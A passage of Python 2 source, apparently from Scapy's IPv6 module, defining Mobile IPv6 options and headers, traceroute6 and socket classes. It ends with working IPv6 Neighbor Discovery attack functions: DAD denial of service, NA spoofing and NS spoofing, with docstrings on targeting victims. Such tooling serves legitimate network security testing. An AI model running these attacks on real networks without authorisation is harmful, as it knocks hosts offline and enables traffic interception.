(RFC4866)", 16: "Care-of Test (RFC4866)" } class _MIP6OptAlign: """ Mobile IPv6 options have alignment requirements of the form x*n+y. 
This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. (x=0 and y=0 are used when no alignment is required)""" def alignment_delta(self, curpos): x = self.x ; y = self.y if x == 0 and y ==0: return 0 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class MIP6OptBRAdvice(_MIP6OptAlign, Packet): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0) ] x = 2 ; y = 0# alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::") ] x = 8 ; y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0) ] x = 2 ; y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign, Packet): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96) ] x = 8 ; y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::") ] x = 8 ; y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY) ] # Only support ethernet x = 0 ; y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust = lambda pkt,x: x+1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from = lambda pkt: pkt.olen-1) ] x = 0 ; y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust = lambda pkt,x: x+5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", 2: "MN-AAA authentication mobility option"}), IntField("mspi", None), StrLenField("authdata", "A"*12, length_from = lambda pkt: pkt.olen-5) ] x = 4 ; y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. 
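# --- Worked example (illustrative, not part of the original module) --------
# An NTP value therefore splits into 32 bits of whole seconds since 1900 and
# a 32-bit binary fraction.  Converting such a value to a Unix time by hand:
#
#     ntp  = 0xD76AA3E880000000                 # hypothetical sample value
#     secs = (ntp >> 32) + float(ntp & 0xffffffff) / 2 ** 32
#     unix = secs - 2208988800                  # offset 1900-01-01 -> 1970-01-01
#
# NTPTimestampField.i2repr() below performs the same split (carrying the
# 1900/1970 shift in its own 'delta' constant) and then formats the result
# with time.gmtime()/time.strftime().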
class NTPTimestampField(LongField): epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0) def i2repr(self, pkt, x): if x < ((50*31536000)<<32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta from time import strftime t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6) name = "MIPv6 option - Replay Protection" fields_desc = [ ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0) ] x = 8 ; y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0) ] x = 0 ; y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 
5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", '\x00'*8, length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign, Packet): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from = lambda pkt: pkt.olen) ] x = 0 ; y = 0 # alignment requirement: none moboptcls = { 0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest } # Main Mobile IPv6 Classes mhtypes = { 0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA' } # From http://www.iana.org/assignments/mobility-parameters bastatus = { 0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected' } class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = { IPv6: { "nh": 135 }} def post_build(self, p, pay): p += pay l = self.len if self.len is None: l = (len(p)-8)/8 p = p[0] + struct.pack("B", l) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4]+struct.pack("!H", cksum)+p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", "\x00"*2, length_from = lambda pkt: 8*pkt.len-6) ] # TODO: make a generic _OptionsField class _MobilityOptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): self.curpos = curpos PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) def getfield(self, pkt, s): l = self.length_from(pkt) return s[l:],self.m2i(pkt, s[:l]) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def m2i(self, pkt, x): opt = [] while x: o = ord(x[0]) # Option type cls = self.cls if moboptcls.has_key(o): cls = moboptcls[o] try: op = cls(x) except: op = self.cls(x) opt.append(op) if isinstance(op.payload, conf.raw_layer): x = op.payload.load del(op.payload) else: x = 
"" return opt def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except: autopad = 1 if not autopad: return "".join(map(str, x)) curpos = self.curpos s = "" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) pstr = str(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) return s def addfield(self, pkt, s, val): return s+self.i2m(pkt, val) class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 8, length_from = lambda pkt: 8*pkt.len) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same # value "\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. --arno return "\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", "\x00"*2, 2), StrFixedLenField("cookie", "\x00"*8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 16, length_from = lambda pkt: 8*(pkt.len-1)) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): return self.cookie class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return self.cookie class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", "\x00"*8, 8), StrFixedLenField("token", "\x00"*8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 24, length_from = lambda pkt: 8*(pkt.len-2)) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): return self.cookie def answers(self): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return self.cookie def answers(self): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def i2repr(self, pkt, x): return "%d sec" % (4*x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds 
_PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 12, length_from = lambda pkt: 8*pkt.len - 4) ] overload_fields = { IPv6: { "nh": 135 } } def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return "\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default _MobilityOptionsField("options", [], MIP6OptUnknown, 12, length_from = lambda pkt: 8*pkt.len-4) ] overload_fields = { IPv6: { "nh": 135 }} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return "\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = { 1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value' } # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _MobilityOptionsField("options", [], MIP6OptUnknown, 24, length_from = lambda pkt: 8*(pkt.len-2)) ] overload_fields = { IPv6: { "nh": 135 }} _mip6_mhtype2cls = { 0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE } ############################################################################# ############################################################################# ### Traceroute6 ### ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) return ip,asn,desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! 
s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+ "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+ "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+ "{ICMPv6EchoReply:%ir,type%}"))) def get_trace(self): trace = {} for s,r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in trace.itervalues(): try: m = min(x for x, y in k.itervalues() if y[1]) except ValueError: continue for l in k.keys(): # use .keys(): k is modified in the loop if l > m: del k[l] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4 = None, timeout=2, verbose=None, **kargs): """ Instant TCP traceroute using IPv6 : traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport), timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) else: a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a,b ############################################################################# ############################################################################# ### Sockets ### ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x) ############################################################################# ############################################################################# ### Neighbor Discovery Protocol Attacks ### ############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 
tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. 
""" def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt) sendp(rep, iface=iface, verbose=0) print "Reply NS for target address %s (received from %s)" % (tgt, mac) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. """ def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print "Reply NA for target address %s (received from %s)" % (tgt, mac) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). 
By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. 
the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = socket.inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print "solicited node multicast @ does not match target @!" return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src) rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print "Reply NA for target address %s (received from %s)" % (tgt, mac) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. 
